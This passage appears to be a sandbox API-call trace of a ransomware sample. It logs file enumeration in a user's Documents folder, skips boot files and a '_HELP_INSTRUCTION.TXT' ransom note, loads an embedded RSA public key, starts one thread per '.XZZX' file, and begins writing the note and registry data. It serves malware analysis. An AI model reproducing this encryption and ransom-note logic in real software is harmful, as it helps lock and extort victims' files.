[0233.260] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1180 [0233.260] Sleep (dwMilliseconds=0x96) [0233.413] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0233.413] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2="..") returned 1 [0233.413] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2=".") returned 1 [0233.413] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.413] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntldr") returned 0x0 [0233.413] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTLDR") returned 0x0 [0233.413] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.413] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0233.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0233.413] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0233.413] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.413] lstrcpyW (in: lpString1=0x17addc, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0233.413] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1184 [0233.414] Sleep (dwMilliseconds=0x96) [0233.569] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0233.569] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2="..") returned 1 [0233.569] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2=".") returned 1 [0233.569] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.569] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntldr") returned 0x0 [0233.569] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTLDR") returned 0x0 [0233.569] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.569] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.569] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0233.569] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0233.569] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0233.570] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.570] lstrcpyW (in: lpString1=0x17addc, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0233.570] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1188 [0233.570] Sleep (dwMilliseconds=0x96) [0233.724] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0233.724] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2="..") returned 1 [0233.725] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2=".") returned 1 [0233.725] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.725] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntldr") returned 0x0 [0233.725] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTLDR") returned 0x0 [0233.725] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.725] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.725] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0233.725] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0233.725] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0233.725] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.725] lstrcpyW (in: lpString1=0x17addc, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0233.725] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x118c [0233.725] Sleep (dwMilliseconds=0x96) [0233.880] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0233.880] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2="..") returned 1 [0233.881] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2=".") returned 1 [0233.881] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.881] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntldr") returned 0x0 [0233.881] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTLDR") returned 0x0 [0233.881] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.881] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0233.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0233.881] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0233.881] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.881] lstrcpyW (in: lpString1=0x17addc, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0233.881] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1190 [0233.881] Sleep (dwMilliseconds=0x96) [0234.036] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.037] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2="..") returned 1 [0234.037] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2=".") returned 1 [0234.037] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.037] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntldr") returned 0x0 [0234.037] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTLDR") returned 0x0 [0234.037] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.037] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.037] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0234.037] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0234.037] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0234.037] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.037] lstrcpyW (in: lpString1=0x17addc, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0234.037] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0234.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1194 [0234.037] Sleep (dwMilliseconds=0x96) [0234.192] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.192] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2="..") returned 1 [0234.192] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2=".") returned 1 [0234.193] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.193] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntldr") returned 0x0 [0234.193] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTLDR") returned 0x0 [0234.193] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.193] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.193] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0234.193] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0234.193] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0234.193] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.193] lstrcpyW (in: lpString1=0x17addc, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0234.193] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0234.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1198 [0234.193] Sleep (dwMilliseconds=0x96) [0234.348] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.348] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0234.348] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0234.348] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0234.348] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0234.349] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0234.349] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0234.349] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0234.349] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0234.349] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0234.349] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0234.349] SetErrorMode (uMode=0x1) returned 0x1 [0234.349] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT") returned 98 [0234.349] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0234.350] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0234.350] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x119c) returned 0x0 [0234.350] RegQueryValueExW (in: 